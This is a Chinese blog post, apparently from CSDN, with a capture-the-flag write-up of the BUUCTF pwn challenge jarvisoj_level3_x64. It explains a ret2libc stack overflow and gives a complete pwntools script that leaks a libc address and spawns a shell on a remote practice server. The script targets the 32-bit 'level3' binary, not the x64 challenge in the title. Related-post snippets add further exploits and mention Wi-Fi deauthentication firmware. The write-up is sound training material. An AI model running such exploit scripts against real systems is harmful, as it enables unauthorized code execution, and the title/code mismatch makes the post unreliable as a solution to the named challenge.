[BUUCTF-pwn]——jarvisoj_level3_x64

于 2023-10-25 10:22:30 发布
阅读量231 收藏
点赞数
分类专栏: # BUUCTF 文章标签: 安全 ret2libc 栈溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/134028583
版权

[BUUCTF-pwn]——jarvisoj_level3_x64

题目分析

简单的ret2libc
通过vuln函数,我们可以看出程序中包含write和read函数,同时存在栈溢出。通过write泄露read的got表地址。进而获得libc,重新控制代码再次进行栈溢出即可获得shell。
在这里插入图片描述

exploit

from pwn import *
context(os='linux',arch='i386',log_level='debug')
#p = process('./level3')
p = remote('node4.buuoj.cn',28847)
elf = ELF('./level3')
#libc = elf.libc
libc = ELF('libc-2.23.so')
write_plt = elf.plt['write']
read_got = elf.got['read']

start = 0x08048350

payload = flat('a' * (0x88+4), write_plt,start,1,read_got,4)
p.sendafter('Input:\n',payload)

read_addr = u32(p.recv(4))
log.info('read_addr is :' + hex(read_addr))

libc_base = read_addr - libc.sym['read']
sys = libc_base + libc.sym['system']
binsh = libc_base + 0x0015902b

payload1 = flat('a' * (0x88+4), sys,start,binsh)
p.sendafter('Input:\n',payload1)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN——jarvisoj_level3
qq_75021728的博客
02-23 61
[BUUCTF]PWN——jarvisoj_level3
BUUCTF(pwn)jarvisoj_level3_x64
半岛铁盒的博客
04-01 418
这道题是一道简单的rop类型的题目,跟之前做的题目有一些差异:( 这是64位的需要一些额外的操作 ) 64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。 这里我们使用 write 函数 来泄密 libc地址 ssize_t write(int fd,const void*buf,size_t count); 参数说明: f.
[BUUCTF]PWN——jarvisoj_level3_x64
BangSen1的博客
03-17 227
jarvisoj_level3_x64 例行检查,64位,开启NX保护。 运行一下。 IDA打开,查看main函数 function()函数 buf溢出漏洞,read之前已经调用过write函数,利用它来泄露libc版本 64位程序在传参的时候要先用到rdi,rsi,rdx,rcx,r8,r9这几个寄存器,都满了之后才会在栈上传参 利用ROPgadget找一下设置寄存器的指令 rdi=0x4006b3 rsi_r15=0x4006b1 payload='a'*(0x80+8)+p64(rdi)+
Jarvis OJlevel3_x64_通用ROP
Jc
07-13 298
解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 2.代码审计 3.漏洞分析 1.程序无system和bin/sh,并且是个64位的,我们不能进行往栈里面写入数据 2.64位汇编 当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样,...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
jarvisoj_level3_x64
m0sway的博客
11-26 586
jarvisoj_level3_x64 使用checksec查看: 只开启了栈不可执行,应该是jarvisoj_level3的x64版本,直接放进IDA中看吧: 主函数中直接给出了漏洞函数,跟进查看: read()函数,存在栈溢出,和jarvisoj_level3的主要区别在栈上传参和寄存器传参。 exp: from pwn import * #start # r = process("../buu/jarvisoj_level3_x64") r = remote("node4.buuoj.cn",
BUUCTF jarvisoj_level3
红叶的博客
10-27 321
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
BUUCTF--pwn--jarvisoj_level3_x64【ret2libc_64】
qq_73149934的博客
12-05 548
BUUCTF--pwn--jarvisoj_level3_x64
BUUCTF(pwn)jarvisoj_level3
半岛铁盒的博客
04-02 274
EXP from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25564) main=0x8048484 elf=ELF('./2') write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl..
BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 653
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 440
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
BUUCTF jarvisoj exp整合
菜的只能随便写写博客
02-24 564
0x01 jarvisoj_level0  简单的地址改写 from pwn import * p = remote('node3.buuoj.cn', 26882) #p = process('./level0') shell_addr = 0x0000000000400596 p.sendline('a'*0x88+p64(shell_addr)) p.interactive()  ...
jarvisoj_level1
最新发布
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值